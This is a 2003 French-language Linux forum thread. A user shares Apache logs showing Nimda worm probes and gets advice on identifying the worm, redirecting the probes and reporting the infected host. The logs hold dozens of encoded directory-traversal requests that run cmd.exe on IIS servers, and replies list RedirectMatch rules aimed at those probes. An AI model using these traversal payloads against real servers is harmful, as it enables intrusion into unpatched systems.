Surprise dans mes logs Apache

Surprise dans mes logs Apache - réseaux et sécurité - Linux et OS Alternatifs

Marsh Posté le 17-11-2003 à 13:22:18    


Par hasard j'ai chécker mes logs apache et voici ce que je trouve  

Code :
  1. 217.128.177.10 - - [17/Nov/2003:03:44:16 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
  2. 217.128.177.10 - - [17/Nov/2003:03:44:16 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
  3. 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  4. 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  5. 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  6. 217.128.177.10 - - [17/Nov/2003:03:44:18 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  7. 217.128.177.10 - - [17/Nov/2003:03:44:19 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  8. 217.128.177.10 - - [17/Nov/2003:03:44:19 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
  9. 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  10. 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  11. 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  12. 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  13. 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  14. 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  15. 217.128.177.10 - - [17/Nov/2003:03:44:22 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  16. 217.128.177.10 - - [17/Nov/2003:03:44:22 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  17. 217.128.177.10 - - [17/Nov/2003:04:55:27 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
  18. 217.128.177.10 - - [17/Nov/2003:04:55:28 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
  19. 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  20. 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  21. 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  22. 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  23. 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  24. 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
  25. 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  26. 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  27. 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  28. 217.128.177.10 - - [17/Nov/2003:04:55:32 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  29. 217.128.177.10 - - [17/Nov/2003:04:55:32 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  30. 217.128.177.10 - - [17/Nov/2003:04:55:33 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  31. 217.128.177.10 - - [17/Nov/2003:04:55:34 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  32. 217.128.177.10 - - [17/Nov/2003:04:55:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  33. 217.128.177.10 - - [17/Nov/2003:04:55:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  34. 217.128.177.10 - - [17/Nov/2003:07:01:56 +0000] "GET http://www.yahoo.com/ HTTP/1.1" 200 1456 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
  35. 217.128.177.10 - - [17/Nov/2003:08:02:27 +0000] "GET /scripts/nsiislog.dll" 404 326 "-" "-"
  36. 217.128.177.10 - - [17/Nov/2003:11:27:26 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
  37. 217.128.177.10 - - [17/Nov/2003:11:27:26 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
  38. 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  39. 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
  40. 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  41. 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  42. 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
  43. 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
  44. 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  45. 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  46. 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  47. 217.128.177.10 - - [17/Nov/2003:11:27:30 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
  48. 217.128.177.10 - - [17/Nov/2003:11:27:30 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  49. 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
  50. 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  51. 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
  52. 217.128.177.10 - - [17/Nov/2003:13:02:22 +0000] "GET http://www.yahoo.com/ HTTP/1.1" 200 1456 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"


 
Le pire c'est que le mec dopit etre en IP fixe car j'ai toujours la meme adresse Ip depuis 3h à 11 heures dans mes logs Iptables .
 
Donc soit le mec est con soit il cherche à se faire enlever son ADSL .
 
Par contre , par curiosité , j'aimerais bien savoir ce qu'il essaye de faire  
 

Reply

Marsh Posté le 17-11-2003 à 13:22:18   

Reply

Marsh Posté le 17-11-2003 à 13:26:24    

bah le mec en lui même essaye pas de te faire du mal ;)
Il a un ver sur sa machine, il y est pour rien... C'est nimda je crois (à vérifier)

Reply

Marsh Posté le 17-11-2003 à 13:31:01    

Mais comment il fonctionne ce vers ?
 
Et comment il détecte les Ip ?
 
 

Reply

Marsh Posté le 17-11-2003 à 13:31:33    

tu rajoutes ca et ca devrait être bon ;)
 

Code :
  1. RedirectMatch (.*)root\.exe(.*) http://www.microsoft.com
  2. RedirectMatch (.*)cmd\.exe(.*) http://www.microsoft.com
  3. RedirectMatch (.*)default\.ida(.*) http://www.microsoft.com
  4. RedirectMatch (.*)favicon\.ico(.*) http://www.microsoft.com
  5. RedirectMatch (.*)\.hash(.*) http://www.microsoft.com

Reply

Marsh Posté le 17-11-2003 à 13:33:44    

Lebibi a écrit :

tu rajoutes ca et ca devrait être bon ;)
 

Code :
  1. RedirectMatch (.*)root\.exe(.*) http://www.microsoft.com
  2. RedirectMatch (.*)cmd\.exe(.*) http://www.microsoft.com
  3. RedirectMatch (.*)default\.ida(.*) http://www.microsoft.com
  4. RedirectMatch (.*)favicon\.ico(.*) http://www.microsoft.com
  5. RedirectMatch (.*)\.hash(.*) http://www.microsoft.com



:lol:


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 13:39:13    

vibidoo a écrit :

Mais comment il fonctionne ce vers ?
 
Et comment il détecte les Ip ?
 
 
 


 
Il exploite une faille des serveurs IIS, et il scanne des plages d'ip à la recherche justement de serveur IIS. QUand il en trouve un, il l'infecte et rebelotte... Mais pour plus d'infos : www.google.com
 
EDIT : Comme je suis gentil ;) http://www.cert.org/advisories/CA-2001-26.html
 
Et bonne idée de rediriger tout ça chez krosoft ;)


Message édité par FloooW le 17-11-2003 à 13:41:00
Reply

Marsh Posté le 17-11-2003 à 13:50:53    

Merci  
 
c'est cool  
;)  

Reply

Marsh Posté le 17-11-2003 à 13:52:25    

Au fait si je redirige tout chez Bill , ils vont pensez que c'est mon serveur qui est infecté ????
OU encore pire , que j'essaye de les hacker ?
 

Reply

Marsh Posté le 17-11-2003 à 13:53:22    

vibidoo a écrit :

Au fait si je redirige tout chez Bill , ils vont pensez que c'est mon serveur qui est infecté ????
OU encore pire , que j'essaye de les hacker ?
 
 

:/


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 13:57:14    

Lebibi a écrit :

tu rajoutes ca et ca devrait être bon ;)
 

Code :
  1. RedirectMatch (.*)favicon\.ico(.*) http://www.microsoft.com




 
Euh le reste oui mais les favicons... :sweat:

Reply

Marsh Posté le 17-11-2003 à 13:57:14   

Reply

Marsh Posté le 17-11-2003 à 14:00:06    

vibidoo a écrit :

Au fait si je redirige tout chez Bill , ils vont pensez que c'est mon serveur qui est infecté ????
OU encore pire , que j'essaye de les hacker ?
 
 


 
C'est pas toi qui va te connecter sur ms c'est la personne qui te scan.
Encore qu'avec ce virus je ne sais pas si ça fonctionne.

Reply

Marsh Posté le 17-11-2003 à 14:05:57    

ArSuniK a écrit :


 
C'est pas toi qui va te connecter sur ms c'est la personne qui te scan.
Encore qu'avec ce virus je ne sais pas si ça fonctionne.
 

t es sur ??
 
car je vois pas comment ca fonctionne :D
 
apache modifie les paquets avec l adresse ip src donc ?


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 14:18:30    

tomate77 a écrit :

t es sur ??
 
car je vois pas comment ca fonctionne :D
 
apache modifie les paquets avec l adresse ip src donc ?


 
c'est pas apache c'est Iptables  
 
mais je préfère ne pas prendre le risque

Reply

Marsh Posté le 17-11-2003 à 14:49:40    

vibidoo a écrit :


 
c'est pas apache c'est Iptables  
 
mais je préfère ne pas prendre le risque  

heu redirectmatch tu mets pas ca ds httpd.conf ??


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 15:02:24    

ArSuniK a écrit :


 
C'est pas toi qui va te connecter sur ms c'est la personne qui te scan.
Encore qu'avec ce virus je ne sais pas si ça fonctionne.
 


faux , ca sera la personne qui redirige qui sera vue par microsoft , néenmoin tres bonne idée quand meme ;) microsoft dira rien ils ont pas que ca a faire que d'éxaminer leur milliards de lignes du meme genre dans leurs logs tous les jours

Reply

Marsh Posté le 17-11-2003 à 15:05:01    

tomate77 a écrit :

heu redirectmatch tu mets pas ca ds httpd.conf ??


 
Euh si c'est dans le conf d'apache  
 
Je pensais a autre chose


Message édité par Vibidoo le 17-11-2003 à 15:05:09
Reply

Marsh Posté le 17-11-2003 à 15:06:04    

ChienDePoche a écrit :


faux , ca sera la personne qui redirige qui sera vue par microsoft , néenmoin tres bonne idée quand meme ;) microsoft dira rien ils ont pas que ca a faire que d'éxaminer leur milliards de lignes du meme genre dans leurs logs tous les jours

ah je me disais bien aussi :D


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 15:23:10    

ChienDePoche a écrit :


faux , ca sera la personne qui redirige qui sera vue par microsoft , néenmoin tres bonne idée quand meme ;) microsoft dira rien ils ont pas que ca a faire que d'éxaminer leur milliards de lignes du meme genre dans leurs logs tous les jours


 
Je viens de vérifier dans la doc d'apache.
Pour les debianeux et autres :
file:///usr/share/doc/apache/manual/mod/mod_alias.html#redirect
 

Citation :


Redirect directive
The Redirect directive maps an old URL into a new one. The new URL is returned to the client which attempts to fetch it again with the new address.


 
Ça renvoit bien la nouvelle url au client (M. nimda) qui va aller se connecter sur ms s'il gère le redirect.

Reply

Marsh Posté le 17-11-2003 à 15:23:43    

ArSuniK a écrit :


 
Je viens de vérifier dans la doc d'apache.
Pour les debianeux et autres :
file:///usr/share/doc/apache/manual/mod/mod_alias.html#redirect
 

Citation :


Redirect directive
The Redirect directive maps an old URL into a new one. The new URL is returned to the client which attempts to fetch it again with the new address.


 
Ça renvoit bien la nouvelle url au client (M. nimda) qui va aller se connecter sur ms s'il gère le redirect.
 

:)


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 15:36:17    

en fait si on veut embéter quelqu'un le RedirectMatch des requetes Nimda c'est aussi un truc marrant à faire    
;)
 
:sarcastic:


Message édité par Vibidoo le 17-11-2003 à 15:36:38
Reply

Marsh Posté le 17-11-2003 à 15:37:11    

vibidoo a écrit :

en fait si on veut embéter quelqu'un le RedirectMatch des requetes Nimda c'est aussi un truc marrant à faire    
;)
 
:sarcastic:

:D
 
mais bon, spa bien :whistle:


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 15:38:39    

bah moi je renvois chez Microsoft. C'est une faille Microsoft, et je n'ai pas IIS chez moi.
 
Je rend à César ce qui est à César :d

Reply

Marsh Posté le 17-11-2003 à 15:38:47    

m$ va se plaindre d'un ddos fait par des barbus intaigristes sous apache :D

Reply

Marsh Posté le 17-11-2003 à 15:40:02    

Sinon oui faut rajouter ca dans httpd.conf

Reply

Marsh Posté le 17-11-2003 à 15:57:44    

vibidoo a écrit :

en fait si on veut embéter quelqu'un le RedirectMatch des requetes Nimda c'est aussi un truc marrant à faire    
;)
 
:sarcastic:


 
Hmmm, faudrait d'abord regarder la rfc sur http voir si ya pas l'adresse du serveur qui fait le redirect ou un truc du genre (je ne pense pas mais on ne sait jamais).
Enfin si ça fonctionne parce que rien ne dit que nimda le gère. Ça m'étonnerais fortement que les gars qui ont pondu ce virus se soient préoccupés de détails de ce genre.
Pour ça il faut tester ou regarder les sources de nimda.

Reply

Marsh Posté le 17-11-2003 à 16:33:14    

Certains ont du temps a perdre... pour emmerder MS.
 
Pour repondre a la question : ecrire un mail au hostmaster de la machine de lui dire que sa machine est infectee. Normalement la machine est soit mise en quarantaine ou est patchee dans les 24h (si tu ne tombes pas sur un blaireau). Sinon tu regardes a qui appartient l'IP et tu indiques le probleme (ripe.net est ton ami).

Reply

Marsh Posté le 17-11-2003 à 16:35:25    

Kahyman a écrit :

Certains ont du temps a perdre... pour emmerder MS.
 
Pour repondre a la question : ecrire un mail au hostmaster de la machine de lui dire que sa machine est infectee. Normalement la machine est soit mise en quarantaine ou est patchee dans les 24h (si tu ne tombes pas sur un blaireau). Sinon tu regardes a qui appartient l'IP et tu indiques le probleme (ripe.net est ton ami).

sauf ke tu n aura pas affaire avec un webmaster mais un particulier donc DTC pour le mailer :o


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 16:42:46    

oui c'est un particulier , abonné mamadoo

Reply

Marsh Posté le 17-11-2003 à 16:43:01    

vibidoo a écrit :

oui c'est un particulier , abonné mamadoo

ct sur ca ;)


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 16:48:11    

En tous cas le nimda il lache pas prise j'ai fait les redirectmatch dans mes conf + DROP de l'IP et 10 mn encore je le voyait dans mes log (kernel) .
 
C'est que c'est tétue ces petits vers


Message édité par Vibidoo le 17-11-2003 à 16:48:22
Reply

Marsh Posté le 17-11-2003 à 16:51:22    

tomate77 a écrit :

sauf ke tu n aura pas affaire avec un webmaster mais un particulier donc DTC pour le mailer :o


 
S'il ne repond pas ? Tu ecris un mail a wannadoo signalant qu'un de leurs clients (etc...) et que tu exiges qu'ils reglent le probleme.
 
Non mais vous n'avez jamais fait ca ?
 
Et tes "DTC" tu te les garde.

Reply

Marsh Posté le 17-11-2003 à 16:52:47    

Kahyman a écrit :


 
S'il ne repond pas ? Tu ecris un mail a wannadoo signalant qu'un de leurs clients (etc...) et que tu exiges qu'ils reglent le probleme.
 
Non mais vous n'avez jamais fait ca ?
 
Et tes "DTC" tu te les garde.

sauf ke mamadoo risque fort de closed le compte du monsieur alors ke ce n est pas un "pirate"  :sarcastic: (j ai vu un poste sur WSR d un gars a ki s est arrive :/)


Message édité par Tomate le 17-11-2003 à 16:53:26

---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 16:57:05    

mamadoo risque surtout de jeter le mail à la poubelle ;)

Reply

Marsh Posté le 17-11-2003 à 17:00:39    

ArSuniK a écrit :

mamadoo risque surtout de jeter le mail à la poubelle ;)
 

pas sur
 
comme je l ai dis, un hard de WSR a eu son compte closed pour une histoire comme ca :/


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 17:03:10    

tomate77 a écrit :

sauf ke mamadoo risque fort de closed le compte du monsieur alors ke ce n est pas un "pirate" :sarcastic:  


 
une machine verollee doit etre mise en quarantaine... ce qui ne signifie pas fermeture de compte (coupure de connexion le temps d'une correction de probleme != fermeture de compte).
 
Mais il est clair qu'il est plus intelligent de laisser faire et de rediriger vers MS que d'informer d'un probleme qui risque de veroller d'autres machines...
 
anyway... je vais boire une biere

Reply

Marsh Posté le 17-11-2003 à 17:06:16    

tomate77 a écrit :

un hard de WSR a eu son compte closed pour une histoire comme ca :/


 
Quand on est incapable de poser un patch pour un probleme existant depuis 3 ans c'est merite...
 
Et encore une fois : j'ai dis "ecrire au hostmaster" (je n'ai jamais vu de site web sans adresse mail pour contacter le webmaster)... puis seulement ecrire au provider.

Reply

Marsh Posté le 17-11-2003 à 17:06:53    

Kahyman a écrit :


 
[g]S'il ne repond pas ? [/g)Tu ecris un mail a wannadoo signalant qu'un de leurs clients (etc...) et que tu exiges qu'ils reglent le probleme.
 
Non mais vous n'avez jamais fait ca ?
 
Et tes "DTC" tu te les garde.


 
Kahyman  
 
je veux bien ecrire au particulier , mais j'ai juste son IP je sais meme pas si elle est dynamique ou fixe .
 
Mon seul moyen serait de prévenir son FAI .


Message édité par Vibidoo le 17-11-2003 à 17:07:42
Reply

Marsh Posté le 17-11-2003 à 17:07:38    

oue oue
 
bref, moi je m en fou, suis sous linux :D


---------------
:: Light is Right ::
Reply

Marsh Posté le 17-11-2003 à 17:08:03    

on l'est tous sous OSA non ?

Reply

Marsh Posté le 17-11-2003 à 17:08:30    

vibidoo a écrit :

on l'est tous sous OSA non ?

nan
antp, romf, F18, ... :D


---------------
:: Light is Right ::
Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed